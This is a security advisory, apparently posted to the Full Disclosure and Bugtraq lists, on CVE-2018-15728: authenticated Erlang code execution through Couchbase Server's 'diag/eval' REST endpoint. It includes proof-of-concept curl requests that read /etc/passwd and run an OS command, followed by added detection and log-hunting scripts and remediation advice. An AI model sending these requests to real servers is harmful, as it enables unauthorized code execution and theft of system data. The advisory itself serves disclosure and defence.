Message-ID: <732f7492-abda-4162-a896-7c686496a0a2@journal.report.generator>
Date: Thu, 23 Aug 2018 09:22:34 +0000
From: x ksi <s3810@...stk.edu.pl>
To: <fulldisclosure@...lists.org>, <bugtraq@...urityfocus.com>
Subject: Couchbase Server - Remote Code Execution
Hey,
Description:
Couchbase Server [1] exposes a REST API [2] which by default listens on
TCP/8091 (plain) and/or TCP/18091 (TLS).
Authenticated users can POST arbitrary Erlang code to the 'diag/eval'
endpoint of that API. The node's Erlang VM evaluates the code, so it runs
on the underlying operating system with the privileges of the user that
was used to start Couchbase.
The 'diag/eval' endpoint is referenced in the official documentation
[3][4][5]; however, the documentation does not contain any information
about the risks of allowing access to the endpoint in question.
Unfortunately, I was not able to confirm which versions of Couchbase
are affected and whether the 'diag/eval' endpoint is enabled by default.
You can use the PoC provided below to verify whether your installation
is affected.
Proof of Concept:
('ABCD' stands for the base64-encoded 'user:password' of an account that
can authenticate to the REST API. The result of the evaluated expression
is returned in the HTTP response body.)
1. Read a file from the node's filesystem (binary_to_list/1 turns the
   file contents into a printable string):
   curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval \
     -X POST -d 'case file:read_file("/etc/passwd") of {ok, B} ->
     binary_to_list(B) end.'
2. Run an OS command with the privileges of the Couchbase user:
   curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval \
     -X POST -d 'os:cmd("env")'
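The PoC above proves the issue by reading a file and running a command. For checking a fleet of nodes it is better to send one harmless expression and only look at whether its result comes back. The script below is an added example, not part of the original advisory or of Couchbase itself. It assumes what the os:cmd PoC relies on: that 'diag/eval' returns the evaluated expression's value verbatim in the response body. The verdict names and the arithmetic nonce expression are this example's own choices.

```python
"""Safe check for an exposed Couchbase 'diag/eval' endpoint.

Instead of reading files or running OS commands, it asks the node to
evaluate one harmless arithmetic expression containing a random nonce and
checks whether the expected result comes back. That is enough to prove the
endpoint evaluates caller-supplied Erlang without touching the host.
"""
import base64
import secrets
import urllib.error
import urllib.request

ENDPOINT = "/diag/eval"


def probe_expression(nonce):
    """Erlang expression whose result is predictable but not guessable."""
    return "%d + 1." % nonce


def classify(status, body, nonce):
    """Map an HTTP status/body pair to a verdict (names are this example's).

    'evaluates'  - the nonce+1 result came back: code execution works
    'auth'       - 401: credentials rejected (endpoint may still be exposed)
    'forbidden'  - 403: the account lacks whatever permission is required
    'absent'     - 404: the node does not serve the endpoint
    'unknown'    - anything else; inspect the body by hand
    """
    if status == 200 and body.strip() == str(nonce + 1):
        return "evaluates"
    if status == 401:
        return "auth"
    if status == 403:
        return "forbidden"
    if status == 404:
        return "absent"
    return "unknown"


def check_diag_eval(base_url, user, password, timeout=10):
    """POST the probe expression with HTTP Basic auth and classify the reply."""
    nonce = secrets.randbelow(10**9)
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=probe_expression(nonce).encode(),
        method="POST",
        headers={"Authorization": "Basic " + token,
                 "Content-Type": "text/plain"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        # 401/403/404 arrive here; the body is still worth keeping.
        status, body = e.code, e.read().decode("utf-8", "replace")
    except urllib.error.URLError as e:
        return "unreachable", 0, str(e.reason)
    return classify(status, body, nonce), status, body


if __name__ == "__main__":
    import sys
    # usage: python check_diag_eval.py http://x.x.x.x:8091 user password
    url, user, pw = sys.argv[1:4]
    verdict, status, body = check_diag_eval(url, user, pw)
    print("%s (HTTP %d): %s" % (verdict, status, body[:200]))
```

A verdict of 'evaluates' with a low-privilege account is the worst case; 'auth' or 'forbidden' only tells you the supplied credentials were not enough, not that the endpoint is closed, so run it once more with an administrator account before declaring a node unaffected.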
Remediation:
Contact the vendor for remediation guidance. Alternatively, restrict
network access to the REST API (TCP/8091 and TCP/18091) to administration
hosts, block or filter the 'diag/eval' path at a proxy or firewall in
front of the nodes, and treat every credential the endpoint accepts as
equivalent to shell access on the node: keep those credentials to the
minimum set of administrators and rotate them if exposure is suspected.
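Restricting access is the fix; knowing whether the endpoint was already used is the other half. The script below is an added detection example, not part of the advisory or of Couchbase. It assumes the node's HTTP access log uses a common-log-style line (client, user, timestamp, request line, status), which must be verified against your own log files before the regex is trusted; the sample lines are constructed, not real traffic. An access log records the request line, not the POST body, so it shows that code was evaluated, not what it did.

```python
"""Hunt for 'diag/eval' requests in a Couchbase-style HTTP access log."""
import re
from collections import Counter

# Constructed sample lines (not real traffic) in common-log style. Whether
# the real http_access.log matches this layout is an assumption to verify.
SAMPLE_LOG = """\
10.0.0.5 - Administrator [23/Aug/2018:08:40:01 +0000] "GET /pools/default HTTP/1.1" 200 4012 - curl/7.58.0
10.0.0.9 - Administrator [23/Aug/2018:08:41:15 +0000] "POST /diag/eval HTTP/1.1" 200 512 - curl/7.58.0
10.0.0.9 - backup_svc [23/Aug/2018:08:41:20 +0000] "POST /diag/eval HTTP/1.1" 403 0 - python-requests/2.19
203.0.113.7 - - [23/Aug/2018:08:42:03 +0000] "POST /diag/eval?x=1 HTTP/1.1" 401 0 - -
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop any query string
    return rec


def find_diag_eval(log_text):
    """Return every parsed request that hit /diag/eval, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] == "/diag/eval":
            hits.append(rec)
    return hits


def successful_evals(hits):
    """Only POSTs answered with 200 actually evaluated code on the node."""
    return [h for h in hits if h["method"] == "POST" and h["status"] == 200]


def summarize(hits):
    """Count (source, user, status) triples so repeated probing stands out."""
    return Counter((h["src"], h["user"], h["status"]) for h in hits)


if __name__ == "__main__":
    import sys
    # usage: python hunt_diag_eval.py /path/to/http_access.log
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    hits = find_diag_eval(text)
    for h in successful_evals(hits):
        print("CODE EXECUTED %s by %s from %s" % (h["ts"], h["user"], h["src"]))
    for key, n in summarize(hits).most_common():
        print("%-15s %-15s %3d  x%d" % (key + (n,)))
```

Every successful POST to the endpoint from a source that is not one of your administration hosts, or outside a change window, is an incident signal; the 401 and 403 rows show who probed for it and which accounts were tried.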
Timeline:
18.06.2018: Following vendor guidelines [6], the information about the
issue was sent to security@...chbase.com.
20.06.2018: Follow-up email was sent to the vendor to confirm receipt
of the original report.
21.08.2018: MDSec published an advisory about a similar vulnerability
in Apache CouchDB [7].
21.08.2018: CVE requested from MITRE.
22.08.2018: MITRE assigned CVE-2018-15728 for this issue.
23.08.2018: The advisory has been released.
References:
[1] https://www.couchbase.com/
[2] https://developer.couchbase.com/documentation/server/current/rest-api/rest-intro.html
[3] https://developer.couchbase.com/documentation/server/3.x/admin/Tasks/xdcr-modify-settings.html
[4] https://developer.couchbase.com/documentation/server/4.1/security/security-comm-encryption.html
[5] https://developer.couchbase.com/documentation/server/4.1/security/security-client-ssl.html
[6] https://www.couchbase.com/resources/security#VulnerabilityReporting
[7] https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/
Thanks,
Filip Palian